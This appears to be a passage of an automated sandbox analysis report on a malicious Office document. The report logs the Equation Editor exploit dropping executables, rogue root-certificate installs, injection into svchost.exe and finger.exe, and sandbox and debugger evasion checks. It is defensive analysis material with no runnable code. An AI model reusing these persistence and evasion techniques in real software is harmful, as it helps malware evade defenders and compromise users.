Source:	Binary string: svchost.pdb source: finger.exe, 00000008.00000002.841615616.000000000289C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841422328.000000000065E000.00000004.00000020.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.457706612.000000000128C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_012B42DE

Source: sqlite3.dll.8.dr	Static PE information: section name: /4
Source: sqlite3.dll.8.dr	Static PE information: section name: /19
Source: sqlite3.dll.8.dr	Static PE information: section name: /31
Source: sqlite3.dll.8.dr	Static PE information: section name: /45
Source: sqlite3.dll.8.dr	Static PE information: section name: /57
Source: sqlite3.dll.8.dr	Static PE information: section name: /70
Source: sqlite3.dll.8.dr	Static PE information: section name: /81
Source: sqlite3.dll.8.dr	Static PE information: section name: /92

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605376 push edx; ret	2_2_00605377
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060537E push edx; ret	2_2_0060537F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F8F60 push eax; retf	2_2_005F8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00604E2A push edx; ret	2_2_00604E2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00604E32 push edx; ret	2_2_00604E33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006055C2 push ebx; ret	2_2_006055C3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F01F4 push eax; retf	2_2_005F01F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005FC3F0 push A0005FC4h; ret	2_2_005FC3F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006055BA push ebx; ret	2_2_006055BB
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D0A76 push ecx; ret	5_2_012D0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041F8A2 push ecx; iretd	6_2_0041F8A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041F949 pushfd ; retf	6_2_0041F95D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040E2DC push ss; ret	6_2_0040E2DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402364 push edx; retf	6_2_00402367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042F3F2 push eax; ret	6_2_0042F3F4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004023A4 pushfd ; retf	6_2_004023A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00403460 push eax; ret	6_2_00403462
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00414DD9 push ebx; ret	6_2_00414DED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00414DE3 push ebx; ret	6_2_00414DED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00414DF6 push ecx; ret	6_2_00414DFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041FEE8 push esi; ret	6_2_0041FF35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041FF4D push esi; ret	6_2_0041FF35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041F75F pushad ; iretd	6_2_0041F760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004077EF push esi; retf	6_2_004077F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0088DFA1 push ecx; ret	6_2_0088DFB4
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03F16B68 push eax; ret	7_2_03F16B6A
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03F0BA71 push ss; ret	7_2_03F0BA72
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EF5A52 push ss; ret	7_2_03EF5A53
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03F070BF pushfd ; retf	7_2_03F070D3
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03F07018 push ecx; iretd	7_2_03F0701F
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Code function: 7_2_03EEEF65 push esi; retf	7_2_03EEEF67

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\finger.exe	File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012CF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_012CF98E
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01341C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_01341C41

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_5-98761

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_008D0101 rdtsc

6_2_008D0101

Source: C:\Windows\SysWOW64\finger.exe	Window / User API: threadDelayed 1234			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Window / User API: threadDelayed 8720			Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	API coverage: 4.3 %
Source: C:\Windows\SysWOW64\finger.exe	API coverage: 2.3 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2956	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3220	Thread sleep count: 1234 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3220	Thread sleep time: -2468000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3452	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3220	Thread sleep count: 8720 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3220	Thread sleep time: -17440000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3248	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe TID: 3268	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe TID: 3268	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe TID: 3268	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_0131DBBE
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012EC2A2 FindFirstFileExW,	5_2_012EC2A2
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0132698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_0132698F
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_013268EE FindFirstFileW,FindClose,	5_2_013268EE
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_0131D076
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0131D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_0131D3A9
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_0132979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0132979D
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01329642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_01329642
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01329B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01329B2B
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01325C97 FindFirstFileW,FindNextFileW,FindClose,	5_2_01325C97

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_012B42DE

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_008D0101 rdtsc

6_2_008D0101

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_00418A63 LdrLoadDll,

6_2_00418A63

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0132EAA2 BlockInput,

5_2_0132EAA2

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_012E2622

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_012B42DE

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D4CE8 mov eax, dword ptr fs:[00000030h]	5_2_012D4CE8
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_001D3540 mov eax, dword ptr fs:[00000030h]	5_2_001D3540
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_001D35A0 mov eax, dword ptr fs:[00000030h]	5_2_001D35A0
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_001D1ED0 mov eax, dword ptr fs:[00000030h]	5_2_001D1ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00870080 mov ecx, dword ptr fs:[00000030h]	6_2_00870080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008700EA mov eax, dword ptr fs:[00000030h]	6_2_008700EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_008926F8 mov eax, dword ptr fs:[00000030h]	6_2_008926F8

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_01310B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_01310B62

